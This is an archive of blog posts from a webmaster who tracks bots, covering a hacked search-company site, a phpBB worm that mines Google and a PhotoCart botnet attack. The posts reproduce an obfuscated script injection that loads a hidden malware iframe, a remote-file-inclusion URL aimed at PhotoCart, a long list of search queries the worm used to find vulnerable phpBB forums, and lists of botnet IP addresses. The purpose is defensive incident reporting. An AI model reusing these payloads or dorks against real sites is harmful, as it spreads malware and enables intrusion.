Friday, January 05, 2007

Bot Hunters Beware: Search Engine Site Hacked

Beware that investigating user agents and referrers that show up in your log files because you could just end up being infected with a virus!

This little crawler left a his calling card:

38.99.203.110 "panscient.com"
A quick trip to the Panscient site shows it has been hacked and the home page has this javascript inserted into the top of the file:
<script language="javascript"> document.write(
unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E') ); </script>
When decoded that javascript becomes a link to the source of the downloader virus:
<iframe src= http://81.95.146.98/index.html
frameborder="0" width="1" height="1" scrolling="no"
name=counter></iframe>
Thanks to John Andrews for the tip that they were hacked and spreading a virus as I've been to Panscient's site before and didn't notice anything wrong., but it was definitely infected I went there today!
 Just heed this as a cautionary tale that things in your log file could be a lure by hackers to infect you with something not currently detected by virus scanners, which is a good reason why I disable javascript when I do most of my bot hunting.

Besides, who best to hack and humiliate than the very people that battle these vermin on a daily basis?

So bot busters BEWARE!

UPDATE - I checked other domains on the server and it's hacked all over the place. Hard to believe that a company selling custom search engines doesn't even have their own dedicated server, just weird.

Tuesday, January 02, 2007

Botnet Perl/Asan.A.worm Mining Google and Infecting phpBB

Finally got in touch with one of the owners of a server that was hacked and actively mounting the botnet attack and got some good information. There was a file installed on the server called gugl.txt which was a Perl script that had an active load running on the server when it was shutdown.

Took about 5 seconds to glance at this file and it's obvious I was absolutely correct about how they were finding vulnerable sites using Google as the primary data mining facility. The only thing I found a bit odd is why they were using Google Japan "www.google.co.jp" when the other evidence I found pointed to Google Turkey, perhaps 2 different hackers or worms, perhaps just spreading the load around so Google won't notice, who knows.

The file they download to your server to locate more vulnerable servers is here:

http://lawhelper.com.ua/gugl.txt
When I opened the file my virus scanner claimed it was a Perl.Asan virus so I did a bit of research and Panda claims it's the Perl/Asan.A.worm or something similar, that locates and infects phpBB systems.

Here's the searches in human readable form that gugl.txt was using to look for vulnerabilities:

"posting.php?mode=newtopic" "viewtopic.php?t=" "viewtopic"+"&view=previous" "Powered+By+phpBB+2.0.4" "Powered+By+phpBB+2.0.5" "Powered+By+phpBB+2.0.6" "Powered+By+phpBB+2.0.7" "Powered+By+phpBB+2.0.8" "Powered+By+phpBB+2.0.9" "Powered+By+phpBB+2.0.10" "Powered+By+phpBB+2.0.10" "Powered+By+phpBB+2.0.11" "Powered+By+phpBB+2.0.2" "Powered+By+phpBB+2.0.1" "Powered+by+phpbb+2.0.10".com "Powered+by+phpbb+2.0.8".com "Powered+by+phpbb+2.0.6".com "Powered+by+phpbb+2.0.10".net "Powered+by+phpbb+2.0.6".net "Powered+by+phpbb+2.0.8".de "Powered+by+phpbb+2.0.6".de "Powered+by+phpbb+2.0.10".de "Powered+by+phpbb+2.0.8".be "Powered+by+phpbb+2.0.6".be "Powered+by+phpbb+2.0.10".be "Powered+by+phpbb+2.0.8".ca "Powered+by+phpbb+2.0.6".ca "Powered+by+phpbb+2.0.10".ca "Powered+by+phpbb+2.0.8".org "Powered+by+phpbb+2.0.6".org "Powered+by+phpbb+2.0.10".org "Powered+by+phpbb+2.0.6"foro "Powered+by+phpbb+2.0.8"foro "Powered+by+phpbb+2.0.10"foro "Powered+by+phpbb+2.0.6"forum "Powered+by+phpbb+2.0.8"forum "Powered+by+phpbb+2.0.10"forum "Powered+by+phpbb+2.0.6"phpbb "Powered+by+phpbb+2.0.8"phpbb "Powered+by+phpbb+2.0.10"phpbb "test+forum+1"+"phpbb"+"2.0.6" "test+forum+1"+"phpbb"+"2.0.8" "test+forum+1"+"phpbb"+"2.0.10" "welcome+to+phpbb+2"+"phpbb"+"2.0.6" "welcome+to+phpbb+2"+"phpbb"+"2.0.8" "Powered+by+phpbb+2.0.8".us "Powered+by+phpbb+2.0.6".us "Powered+by+phpbb+2.0.10".us "Powered+by+phpbb+2.0.8".tw "Powered+by+phpbb+2.0.6".tw "Powered+by+phpbb+2.0.10".tw "Powered+by+phpbb+2.0.8".cn "Powered+by+phpbb+2.0.6".cn "Powered+by+phpbb+2.0.10".cn "Powered+by+phpbb+2.0.8".hk "Powered+by+phpbb+2.0.6".hk "Powered+by+phpbb+2.0.10".hk "Powered+by+phpbb+2.0.8".se "Powered+by+phpbb+2.0.6".se "Powered+by+phpbb+2.0.10".se "Powered+by+phpbb+2.0.8".ar "Powered+by+phpbb+2.0.6".ar "Powered+by+phpbb+2.0.10".ar "Powered+by+phpbb+2.0.8".at "Powered+by+phpbb+2.0.6".at "Powered+by+phpbb+2.0.10".at "Powered+by+phpbb+2.0.8".uy "Powered+by+phpbb+2.0.6".uy "Powered+by+phpbb+2.0.10".uy "Powered+by+phpbb+2.0.8".cz "Powered+by+phpbb+2.0.6".cz "Powered+by+phpbb+2.0.10".cz "Powered+by+phpbb+2.0.8".kr "Powered+by+phpbb+2.0.6".kr "Powered+by+phpbb+2.0.10".kr "Powered+by+phpbb+2.0.8".jp "Powered+by+phpbb+2.0.6".jp "Powered+by+phpbb+2.0.10".jp "Powered+by+phpbb+2.0.8".dk "Powered+by+phpbb+2.0.6".dk "Powered+by+phpbb+2.0.10".dk "Powered+by+phpbb+2.0.8".yu "Powered+by+phpbb+2.0.6".yu "Powered+by+phpbb+2.0.10".yu "Powered+by+phpbb+2.0.8".my "Powered+by+phpbb+2.0.6".my "Powered+by+phpbb+2.0.10".my "Powered+by+phpbb+2.0.8".info "Powered+by+phpbb+2.0.6".info "Powered+by+phpbb+2.0.10".info "Powered+by+phpbb+2.0.8".gr "Powered+by+phpbb+2.0.6".gr "Powered+by+phpbb+2.0.10".gr "Powered+by+phpbb+2.0.8".uk "Powered+by+phpbb+2.0.6".uk "Powered+by+phpbb+2.0.10".uk "Powered+by+phpbb+2.0.8".pe "Powered+by+phpbb+2.0.6".pe "Powered+by+phpbb+2.0.10".pe "Powered+by+phpbb+2.0.8".co "Powered+by+phpbb+2.0.6".co "Powered+by+phpbb+2.0.10".co "Powered+by+phpbb+2.0.8".ve "Powered+by+phpbb+2.0.6".ve "Powered+by+phpbb+2.0.10".ve "Powered+by+phpbb+2.0.8".cl "Powered+by+phpbb+2.0.6".cl "Powered+by+phpbb+2.0.10".cl "Powered+by+phpbb+2.0.8".py "Powered+by+phpbb+2.0.6".py "Powered+by+phpbb+2.0.8".bo "Powered+by+phpbb+2.0.6".bo "Powered+by+phpbb+2.0.10".bo "Powered+by+phpbb+2.0.8".ec "Powered+by+phpbb+2.0.6".ec "Powered+by+phpbb+2.0.10".ec "Powered+by+phpbb+2.0.8".mx "Powered+by+phpbb+2.0.6".mx "Powered+by+phpbb+2.0.10".mx "Powered+by+phpbb+2.0.8".fi "Powered+by+phpbb+2.0.6".fi "Powered+by+phpbb+2.0.10".fi "Powered+by+phpbb+2.0.8".si "Powered+by+phpbb+2.0.6".si "Powered+by+phpbb+2.0.10".si "Powered+by+phpbb+2.0.8".ch "Powered+by+phpbb+2.0.6".ch "Powered+by+phpbb+2.0.10".ch "Powered+by+phpbb+2.0.8".es "Powered+by+phpbb+2.0.6".es "Powered+by+phpbb+2.0.10".es "Powered+by+phpbb+2.0.8".fr "Powered+by+phpbb+2.0.6".fr "Powered+by+phpbb+2.0.10".fr "Powered+by+phpbb+2.0.8".br "Powered+by+phpbb+2.0.6".br "Powered+by+phpbb+2.0.10".br "Powered+by+phpbb+2.0.8".ru "Powered+by+phpbb+2.0.6".ru "Powered+by+phpbb+2.0.10".ru "Powered+by+phpbb+2.0.8".ro "Powered+by+phpbb+2.0.6".ro "Powered+by+phpbb+2.0.10".ro "Powered+by+phpbb+2.0.8".biz "Powered+by+phpbb+2.0.6".biz "Powered+by+phpbb+2.0.10".biz "Powered+by+phpbb+2.0.8".ni "Powered+by+phpbb+2.0.6".ni "Powered+by+phpbb+2.0.10".ni "Powered+by+phpbb+2.0.8".edu "Powered+by+phpbb+2.0.6".edu "Powered+by+phpbb+2.0.10".edu "Powered+by+phpbb+2.0.8".gov "Powered+by+phpbb+2.0.6".gov "Powered+by+phpbb+2.0.10".gov "Powered+by+phpbb+2.0.8".aero "Powered+by+phpbb+2.0.6".aero "Powered+by+phpbb+2.0.10".aero "Powered+by+phpbb+2.0.8".mil "Powered+by+phpbb+2.0.6".mil "Powered+by+phpbb+2.0.10".mil "Powered+by+phpbb+2.0.8".fm "Powered+by+phpbb+2.0.6".fm "Powered+by+phpbb+2.0.10".fm "Powered+by+phpbb+2.0.8".ie "Powered+by+phpbb+2.0.6".ie "Powered+by+phpbb+2.0.10".ie "Powered+by+phpbb+2.0.8".ir "Powered+by+phpbb+2.0.6".ir "Powered+by+phpbb+2.0.10".ir "Powered+by+phpbb+2.0.8".hr "Powered+by+phpbb+2.0.6".hr "Powered+by+phpbb+2.0.10".hr "Powered+by+phpbb+2.0.8".hu "Powered+by+phpbb+2.0.6".hu "Powered+by+phpbb+2.0.10".hu "Powered+by+phpbb+2.0.8".za "Powered+by+phpbb+2.0.6".za "Powered+by+phpbb+2.0.10".za "2.0.4+©+2001,"+topic+View+2.0.4" "2.0.5+©+2001,"+topic+View+2.0.5" "2.0.6+©+2001,"+topic+View+2.0.6" "2.0.7+©+2001,"+topic+View+2.0.7" "2.0.8+©+2001,"+topic+View+2.0.8" "2.0.9+©+2001,"+topic+View+2.0.9" "2*0.4+©+2001-"+topic+View+2.0.10" "2*0.5+©+2001-"+topic+View" "2*0.6+©+2001-"+topic+View" "2*0.7+©+2001-"+topic+View" "2*0.8+©+2001-"+topic+View" "2*0.9+©+2001-"+topic+View" "2-0-5+©+2001."+topic+View" "2-0-5+©+2001."+topic+View" "2-0-5+©+2001."+topic+View" "2-0-5+©+2001."+topic+View" "2-0-5+©+2001."+topic+View" "2.0.10+"inurl:".pt"+"phpbb"+"2.0.6" "inurl:".pt"+"phpbb"+"2.0.8" "inurl:".pt"+"phpbb"+"2.0.10" "inurl:".tz"+"phpbb"+"2.0.6" "inurl:".tz"+"phpbb"+"2.0.8" "inurl:".tz"+"phpbb"+"2.0.10" "inurl:".tr"+"phpbb"+"2.0.6" "inurl:".tr"+"phpbb"+"2.0.8" "inurl:".tr"+"phpbb"+"2.0.10" "inurl:".cc"+"phpbb"+"2.0.6" "inurl:".cc"+"phpbb"+"2.0.8" "inurl:".cc"+"phpbb"+"2.0.10" "inurl:".it"+"phpbb"+"2.0.6" "inurl:".it"+"phpbb"+"2.0.8" "inurl:".it"+"phpbb"+"2.0.10" "inurl:".au"+"phpbb"+"2.0.6" "inurl:".au"+"phpbb"+"2.0.8" "inurl:".au"+"phpbb"+"2.0.10" "inurl:".nz"+"phpbb"+"2.0.6" "inurl:".nz"+"phpbb"+"2.0.8" "inurl:".nz"+"phpbb"+"2.0.10" "inurl:".ee"+"phpbb"+"2.0.6" "inurl:".ee"+"phpbb"+"2.0.8" "inurl:".ee"+"phpbb"+"2.0.10" "inurl:".il"+"phpbb"+"2.0.6" "inurl:".il"+"phpbb"+"2.0.8" "inurl:".il"+"phpbb"+"2.0.10" "inurl:".jm"+"phpbb"+"2.0.6" "inurl:".jm"+"phpbb"+"2.0.8" "inurl:".jm"+"phpbb"+"2.0.10" "inurl:".lv"+"phpbb"+"2.0.6" "inurl:".lv"+"phpbb"+"2.0.8" "inurl:".lv"+"phpbb"+"2.0.10" "inurl:".mg"+"phpbb"+"2.0.6" "inurl:".mg"+"phpbb"+"2.0.8" "inurl:".mg"+"phpbb"+"2.0.10" "inurl:".lt"+"phpbb"+"2.0.6" "inurl:".lt"+"phpbb"+"2.0.8" "inurl:".lt"+"phpbb"+"2.0.10" "inurl:".ma"+"phpbb"+"2.0.6" "inurl:".ma"+"phpbb"+"2.0.8" "inurl:".ma"+"phpbb"+"2.0.10" "inurl:".ws"+"phpbb"+"2.0.6" "inurl:".ws"+"phpbb"+"2.0.8" "inurl:".ws"+"phpbb"+"2.0.10" "inurl:".com"+"phpbb"+"2.0.6" "inurl:".com"+"phpbb"+"2.0.8" "inurl:".com"+"phpbb"+"2.0.10" "inurl:".my"+"phpbb"+"2.0.6" "inurl:".my"+"phpbb"+"2.0.8" "inurl:".my"+"phpbb"+"2.0.10" "inurl:".no"+"phpbb"+"2.0.6" "inurl:".no"+"phpbb"+"2.0.8" "inurl:".no"+"phpbb"+"2.0.10" "inurl:".no"+"phpbb"+"2.0.6" "inurl:".net"+"phpbb"+"2.0.8" "inurl:".net"+"phpbb"+"2.0.10" "inurl:".net"+"phpbb"+"2.0.6" "inurl:".cx"+"phpbb"+"2.0.6" "inurl:".cx"+"phpbb"+"2.0.8" "inurl:".cx"+"phpbb"+"2.0.10" "inurl:".org"+"phpbb"+"2.0.6" "inurl:".org"+"phpbb"+"2.0.8" "inurl:".org"+"phpbb"+"2.0.10" "inurl:".in"+"phpbb"+"2.0.6" "inurl:".in"+"phpbb"+"2.0.8" "inurl:".in"+"phpbb"+"2.0.10" "inurl:".nl"+"phpbb"+"2.0.6" "inurl:".nl"+"phpbb"+"2.0.8" "inurl:".nl"+"phpbb"+"2.0.10" "welcome+to+phpbb+2"+"phpbb"+"2.0.10" "Powered+by+phpBB"+v-i-e-w-t-o-p-i-c-.-p-h-p "P-o-w-e-r-e-d+b-y+p-h-p-B-B" viewtopic.php+"by+phpBB+2001" viewtopic.php+"by+phpBB+2000" viewtopic.php+"by+phpBB+2002" viewtopic.php+by+phpBB+2003" viewtopic.php+"by+phpBB+2004" "ALEKS+HACKED+YOUR+SYSTEM" viewtopic.php+"by+phpBB+2005" viewtopic.php+"by+phpBB+2006"intitle:"::+View+topic" viewtopic.php+"+phpBB+Group" "topic.php?t=""::+View+topic" viewtopic.php?t "View+next+topic" "View+previous+topic" "edit+topic+in+this+forum"+topic+2.0.4+ "edit+topic+in+this+forum"+topic+2.0.5+ "edit+topic+in+this+forum"+topic+2.0.6+ "edit+topic+in+this+forum"+topic+2.0.7+ "edit+topic+in+this+forum"+topic+2.0.8+ "edit+topic+in+this+forum"+topic+2.0.9+ "edit+topic+in+this+forum"+topic+2.0.10+ "All+times+are+GMT"+topic+2.0.4+ "All+times+are+GMT"+topic+2.0.5+ "All+times+are+GMT"+topic+2.0.6+ "All+times+are+GMT"+topic+2.0.7+ "All+times+are+GMT"+topic+2.0.8+ "All+times+are+GMT"+topic+2.0.9+ "All+times+are+GMT"+topic+2.0.10+ "All+times+are+GMT"+topic+2.0.10+ by+phpbb+2.0.4+topic+"Jump+to:"+"You+cannot" by+phpbb+2.0.5+topic+"Jump+to:"+"You+cannot" by+phpbb+2.0.6+topic+"Jump+to:"+"You+cannot" by+phpbb+2.0.7+topic+"Jump+to:"+"You+cannot" by+phpbb+2.0.8+topic+"Jump+to:"+"You+cannot" by+phpbb+2.0.9+topic+"Jump+to:"+"You+cannot" by+phpbb+2.0.10+topic+"Jump+to:"+"You+cannot" "0.4+©+2001,+2002"+next+ "0.5+©+2001,+2002"+next+ "0.6+©+2001,+2002"+next+ "0.7+©+2001,+2002"+next+ "0.8+©+2001,+2002"+next+ "0.9+©+2001,+2002"+next+ "0.10+©+2001,+2002"+next+ "delete+your+posts+in+this+forum"+topic+2.0.4+ "delete+your+posts+in+this+forum"+topic+2.0.5+ "delete+your+posts+in+this+forum"+topic+2.0.6+ "delete+your+posts+in+this+forum"+topic+2.0.7+ "delete+your+posts+in+this+forum"+topic+2.0.8+ "delete+your+posts+in+this+forum"+topic+2.0.9+ "delete+your+posts+in+this+forum"+topic+2.0.10+ viewtopic+2.0.4+ viewtopic+2.0.5+ viewtopic+2.0.6+ viewtopic+2.0.7+ viewtopic+2.0.8+ viewtopic+2.0.9+ viewtopic+2.0.10+ by+phpBB+2.0.4+ by+phpBB+2.0.5+ by+phpBB+2.0.6+ by+phpBB+2.0.7+ by+phpBB+2.0.8+ by+phpBB+2.0.9+ by+phpBB+2.0.10+ "You+cannot+vote+in+polls+in+this+forum"+2.0.4+ "You+cannot+vote+in+polls+in+this+forum"+2.0.5+ "You+cannot+vote+in+polls+in+this+forum"+2.0.6+ "You+cannot+vote+in+polls+in+this+forum"+2.0.7+ "You+cannot+vote+in+polls+in+this+forum"+2.0.8+ "You+cannot+vote+in+polls+in+this+forum"+2.0.9+ "You+cannot+vote+in+polls+in+this+forum"+2.0.10+ "View+topic"+2.0.4+ "View+topic"+2.0.5+ "View+topic"+2.0.6+ "View+topic"+2.0.7+ "View+topic"+2.0.8+ "View+topic"+2.0.9+ "View+topic"+2.0.10+ "View+topic"+2.0.4+ "View+topic"+2.0.5+ "View+topic"+2.0.6+ "View+topic"+2.0.7+ "View+topic"+2.0.8+ "View+topic"+2.0.9+ "View+topic"+2.0.10+ "powered+by"+php+view+0.8+2001+2002+"group"+board+"cannot+post" "powered+by"+php+view+2001+2003+"group"+board+"cannot+post" "powered+by"+php+view+2001+2002+"group"+board+"cannot+post" "powered+by"+php+view+0.4+2001+2002+"group"+board+"cannot+post" "powered+by"+php+view+0.5+2001+2002+"group"+board+"cannot+post" "powered+by"+php+view+0.6+2001+2002+"group"+board+"cannot+post" "powered+by"+php+view+0.7+2001+2002+"group"+board+"cannot+post" "powered+by"+php+view+0.9+2001+2002+"group"+board+"cannot+post" "powered+by"+php+view+0.10+2001+2002+"group"+board+"cannot+post"

Google likes to claim they "Do No Evil" but sure allow themselves to be used for evil.

Would it be too much to ask that Google plug some holes or block some types of searches to stop these worms from finding vulnerable websites?

Come on guys, with all your Billion$ you should be able to have a few security experts on hand, maybe working in conjunction with Panda, Symantec and such, that keep on top of these specific threats and block the specific searches used to locate vulnerable sites.

Not just Google either, they were just the search engine in the center of this particular attack, but the other search engines like Yahoo, Ask and MSN should be blocking access to this stuff as well.

Technically, my server is only under attack because Google showed one of these worms that the phrase "PhotoCart" existed somewhere in my server, and it's not even the software these idiot hackers and looking for in the first place.

Gee thanks Google, like I needed this problem.

Sheesh.

At least now I know what I'm up against.

Monday, January 01, 2007

How To Shut Down Scrapers the AUP Way.

When I first started bot blocking the programmer in me saw it as a simple programming problem that could be solved with technology. Eventually, the realist in me saw that although I can solve a lot of individual webmaster abuse problems with technology that there's no way that a single bot blocking program can saturate a market deep enough to protect everyone.

Consider that bot block is literally putting a bandage on the problem on a server by server basis, or site by site basis, and not really solving the root of the problem for anyone.

Therefore, I've been looking for additional tools and methods to help everyone besides just the technological solutions I'm developing, and have been testing a real simple solution for effectively shutting down scrapers.

Without resorting to adding IP's to firewalls, .htaccess files, or even filing DMCA reports or any of that nonsense for copyright violation, I'm simply using the hosting company's AUP against the scrapers.

You'll find most hosting companies have the same boilerplate AUP clauses:

Unauthorized access to or use of data, systems or networks, including any attempt to probe, scan or test the vulnerability of a system or network or to breach security or authentication measures without express authorization of the owner of the system or network.

Along with this second gem of a clause:

Interference with service to any user, host or network including, without limitation, mailbombing, flooding, deliberate attempts to overload a system and broadcast attacks.

Well it doesn't take a rocket scientist to see that scraping fits into several categories mentioned above, so I wrote a few letters here and there to test the process and so far have been getting a near 100% success rate.

I would advise anyone catching a serious scraper in action to take a few minutes and send a simple AUP violation report to the hosting companies abuse department and include a log file of the violation.

See if that doesn't help eliminate some problems for everyone and not just bandage one server or site at a time.

Sure the scrapers can hop from ISP to ISP, but eventually nobody will take their business and they will have no place left to run. Maybe someone could even set up the equivalent of a SpamHaus for scrapers and their domains for easy reference, now that would be sweet.

Now if I could only find an automatic tool that sends scraper abuse notification reports at the end of the day.... sounds like I'll have to write it!

Try the AUP violation report approach and see if that works.

Please report back your success or failure, we want to know how it works for you!

Hackers Using Google as a PhotoCart Locator Tool

It would appear that I have some evidence that indicates it's the Turkish hackers that are known to exploit these types of vulnerabilities doing this PhotoCart vulnerability attack.

Here's a sample of how they used Google's INURL search function to locate the PhotoCart sites in Google's index:

http://www.google.com.tr/search?hl=tr&q=inurl%3A%2Fphotocart%2F&btnG=Google%27da
As a matter of fact, they hit my blog now that I've been posting about this problem the word "photocart" was in the URL so they got a direct hit on this page:
incredibill.blogspot.com/2006/12/photocart-attack-takes-holiday.html
Here's the source of the "research" for PhotoCart from a Turkish DSL line:
IP Address 88.229.95.xxx
Country Turkey
Sorry about the obfuscated IP address, but I don't want people doing a DoS on him/her/it.

Perhaps Google should restrict some features like INURL: to only be accessed by webmasters registered to use Google tools so they know exactly who these people are when they abuse these features.

PhotoCart Attack Moves Source File To LayeredTech

The PhotoCart attackers regrouped quick after their other compromised server was cleaned up and launched a new wave based on the file they are trying to upload being hosted within Layeredtech.

The file is now being referenced here:

"/PhotoCart/adminprint.php?path=http://artelj.com/c.ar?"
That's in the Layeredtech network somewhere:
host artelj.com has address 72.36.219.90
host 72.36.219.90 -> server2.soloymi.com.

whois 72.36.219.90

OrgName: Layered Technologies, Inc.
NetRange: 72.36.128.0 - 72.36.255.255
This game of cat and mouse is getting old, but if they want to keep playing then I'll keep getting their playgrounds closed one at a time.

The only upside today is the botnet that hit my server was much smaller than in the past and didn't include any IPs from theplanet.com, so perhaps they shut down those compromised locations. Will keep monitoring to see if theplanet.com IP's are used from this point forward to see if they resolved this or not.

Oh well, more letters to write to abuse@bunch-o-companies, sigh...

UPDATE: Looks like it might be the typical vulnerability hackers from Turkey as I caught them hitting my site looking for /PhotoCart/ using a Google INURL search.

Matt Cutts Says Google Dropping AdSense Web Spammers

There's a somewhat heated thread on WebmasterWorld for the past few days about the reasons for the continued survival of Made For AdSense (MFA) sites.

As luck would have it, and perfect timing, Matt Cutts made a post on his blog that included a phrase that I simply couldn't resist commenting about:

So how do we keep the tipping point firmly in the “Google is Good” range?
So I had to call Matt on this and ask the question:
How about getting rid of the Made For AdSense (MFA) sites that are the current scourge of the web and all the search engines?
Much to my surprise, Matt responded with something quite unexpected:
IncrediBILL, that’s a good example where we have a lot of internal discussion; I don’t want that sort of behavior rewarded either. About a month and a half ago, Google decided to pursue this more aggressively, and quite a few people have already been dropped from AdSense for webspam (violations of our quality guidelines). I’m sure I’ll have a chance to talk about it more in 2007. :)
Wow, you could've knocked me over with a feather!

Now THAT's a revelation that many of us battling the AdSense scrapers have been waiting to hear as the scrapers have been winning this battle to date.

Those people using automated scripts to scrape content from one site and generate thousands of AdSense webspam pages and sites a day should start looking for a new way to make money as it appears your days in AdSense are numbered!

Keep your eye on WMW's AdSense forum for a rash of new threads about "Banned From AdSense" and they will bellyache loudly that they don't understand why their 10,000 sites with over 2 million "quality" web pages were dumped.

Here comes the next "I've Been Banned" thread in 5... 4... 3....

Kudo's to Matt for fighting the good fight at Google and we'll keep an eye on the many scraper sites posted in my blog to see if they get booted from AdSense.

Sunday, December 31, 2006

Complete Botnet List Used in PhotoCart Attack

This is probably a small botnet with only 174 IPs involved in currently trying to infect a single website using the PhotoCart vulnerability. I decided to show just far these people are willing to go in order to attempt bypassing possible firewall blocks just to make sure one of them is successful.

Here's the complete botnet list:

140.117.73.1 [finance.nsysu.edu.tw.] requested 379 pages as "libwww-perl/5.805"
147.202.41.61 [x.xhort.com.] requested 29 pages as "libwww-perl/5.805"
158.66.1.12 [service2.mg.gov.pl.] requested 178 pages as "libwww-perl/5.65"
163.178.79.2 [unknown] requested 41 pages as "libwww-perl/5.803"
164.77.213.115 [unknown] requested 1 pages as "libwww-perl/5.805"
189.146.75.42 [dsl-189-146-75-42.prod-infinitum.com.mx.] requested 321 pages as "libwww-perl/5.803"
189.146.80.14 [dsl-189-146-80-14.prod-infinitum.com.mx.] requested 272 pages as "libwww-perl/5.803"
193.192.247.209 [209-sn-5-be.pchighway.com.] requested 1 pages as "libwww-perl/5.805"
194.108.42.38 [sip1.it-help.cz.] requested 7 pages as "libwww-perl/5.803"
194.152.183.230 [unknown] requested 19 pages as "libwww-perl/5.805"
194.177.97.82 [82-97-177-194.serverdedicati.seflow.net.] requested 87 pages as "libwww-perl/5.79"
195.10.193.5 [mailer.fastnetbg.com.] requested 36 pages as "libwww-perl/5.803"
195.206.96.40 [kabsieasy.aic.at.] requested 4 pages as "libwww-perl/5.63"
195.242.211.253 [faq.ecobike.de.] requested 64 pages as "libwww-perl/5.48"
195.242.98.223 [keurigonline07.nl.] requested 51 pages as "libwww-perl/5.79"
198.173.254.167 [sofsup.securesites.net.] requested 14 pages as "libwww-perl/5.65"
198.173.254.49 [gmotion.net.] requested 85 pages as "libwww-perl/5.65"
200.32.10.19 [200-32-10-19.prima.net.ar.] requested 29 pages as "libwww-perl/5.805"
200.73.10.171 [servidor2.icqnet.cl.] requested 39 pages as "libwww-perl/5.805"
200.75.49.133 [clientes_corpor_7549-133.etb.net.co.] requested 6 pages as "libwww-perl/5.64"
202.130.106.156 [unknown] requested 33 pages as "libwww-perl/5.79"
202.139.20.8 [nm8.shoalhaven.net.au.] requested 27 pages as "libwww-perl/5.805"
202.143.173.2 [unknown] requested 2 pages as "libwww-perl/5.65"
202.181.245.88 [unknown] requested 20 pages as "libwww-perl/5.805"
202.83.173.216 [ntc.net.pk.] requested 104 pages as "libwww-perl/5.65"
202.85.134.241 [mail.icreationasia.com.] requested 42 pages as "libwww-perl/5.65"
203.146.140.221 [besthost5.com.] requested 127 pages as "libwww-perl/5.64"
203.167.111.133 [133.111.167.203.assigned.static.eastern-tele.com.] requested 69 pages as "libwww-perl/5.79"
203.167.88.76 [unknown] requested 47 pages as "libwww-perl/5.65"
203.194.134.166 [unknown] requested 386 pages as "libwww-perl/5.65"
203.211.135.130 [130.203-211-135.static.qala.com.sg.] requested 5 pages as "libwww-perl/5.805"
203.223.133.18 [unknown] requested 41 pages as "libwww-perl/5.805"
203.88.121.128 [acr2.soho.aussiehq.net.au.] requested 43 pages as "libwww-perl/5.805"
204.11.234.28 [vn1133.fireboxhosting.com.] requested 159 pages as "libwww-perl/5.805"
204.157.36.20 [unknown20.36.157.204.defenderhosting.com.] requested 56 pages as "libwww-perl/5.805"
204.16.246.8 [gttcp18.30u.com.] requested 302 pages as "libwww-perl/5.805"
205.234.100.65 [unknown65.100.234.205.defenderhosting.com.] requested 64 pages as "libwww-perl/5.805"
205.234.223.229 [unknown.hostforweb.com.] requested 219 pages as "libwww-perl/5.805"
206.123.101.20 [server005.hostspectrum.com.] requested 84 pages as "libwww-perl/5.805"
206.222.19.42 [ns1.ultranetgroup.net.] requested 91 pages as "libwww-perl/5.79"
206.225.92.93 [206-225-92-93.dedicated.abac.net.] requested 330 pages as "libwww-perl/5.803"
207.158.61.3 [ns1.control8.com.] requested 160 pages as "libwww-perl/5.79"
207.99.63.90 [unknown] requested 31 pages as "libwww-perl/5.79"
208.101.29.107 [asprojectos.com.] requested 371 pages as "libwww-perl/5.805"
209.151.94.9 [poplar.vosn.net.] requested 337 pages as "libwww-perl/5.805"
209.172.35.53 [ip-209-172-35-53.reverse.privatedns.com.] requested 217 pages as "libwww-perl/5.79"
209.47.139.138 [server.privatelabelarticlesite.net.] requested 46 pages as "libwww-perl/5.805"
209.47.167.151 [server1.web-marketing-concepts.com.] requested 32 pages as "libwww-perl/5.805"
209.97.207.116 [cowboywebdesigns.com.] requested 48 pages as "libwww-perl/5.65"
210.172.116.244 [unknown] requested 59 pages as "libwww-perl/5.803"
212.12.121.43 [as01-14-212-12-121-43.ip.housing-manager.de.] requested 18 pages as "libwww-perl/5.803"
212.176.124.197 [PBOUL-Chumak2-gw.RoSprint.net.] requested 27 pages as "libwww-perl/5.805"
212.227.83.106 [p15188117.pureserver.info.] requested 130 pages as "libwww-perl/5.76"
212.25.170.80 [wnx-10.seeweb.it.] requested 41 pages as "libwww-perl/5.803"
213.186.116.86 [opel-club.colo.dc.utel.ua.] requested 31 pages as "libwww-perl/5.805"
213.228.142.27 [pal-213-228-142-27.netvisao.pt.] requested 18 pages as "libwww-perl/5.803"
213.234.229.221 [ns1.siriust.ru.] requested 33 pages as "libwww-perl/5.805"
216.16.246.154 [server154.ntouch.ca.] requested 35 pages as "libwww-perl/5.805"
216.17.109.39 [bo.phatservers.com.] requested 449 pages as "libwww-perl/5.805"
216.193.194.223 [abante.lunarpages.com.] requested 93 pages as "libwww-perl/5.805"
216.22.48.208 [216.22.48.208.servint.net.] requested 35 pages as "libwww-perl/5.805"
216.227.220.4 [xena.lunarpages.com.] requested 92 pages as "libwww-perl/5.805"
216.246.45.72 [unknown.scnet.net.] requested 38 pages as "libwww-perl/5.805"
216.55.166.52 [216-55-166-52.dedicated.abac.net.] requested 81 pages as "libwww-perl/5.803"
217.112.42.20 [unknown] requested 22 pages as "libwww-perl/5.79"
217.115.84.178 [mail.continentall.ru.] requested 26 pages as "libwww-perl/5.805"
217.128.167.99 [LPuteaux-151-42-8-99.w217-128.abo.wanadoo.fr.] requested 19 pages as "libwww-perl/5.803"
217.70.144.89 [serverclienti.com.] requested 25 pages as "libwww-perl/5.65"
218.38.14.205 [unknown] requested 93 pages as "libwww-perl/5.79"
219.93.90.33 [unknown] requested 36 pages as "libwww-perl/5.65"
219.94.128.150 [www910.sakura.ne.jp.] requested 150 pages as "libwww-perl/5.805"
220.134.22.185 [main.ethantw.tw.] requested 17 pages as "libwww-perl/5.805"
221.126.152.218 [unknown] requested 3 pages as "libwww-perl/5.65"
221.127.101.145 [unknown] requested 2 pages as "libwww-perl/5.65"
38.100.80.201 [spongebob.jewlzk.com.] requested 1 pages as "libwww-perl/5.805"
62.193.229.152 [host4.i-excom.net.] requested 158 pages as "libwww-perl/5.64"
62.221.213.68 [unknown] requested 34 pages as "libwww-perl/5.65"
62.4.70.180 [62.4.70.180.fantasyvirtual.com.] requested 153 pages as "libwww-perl/5.803"
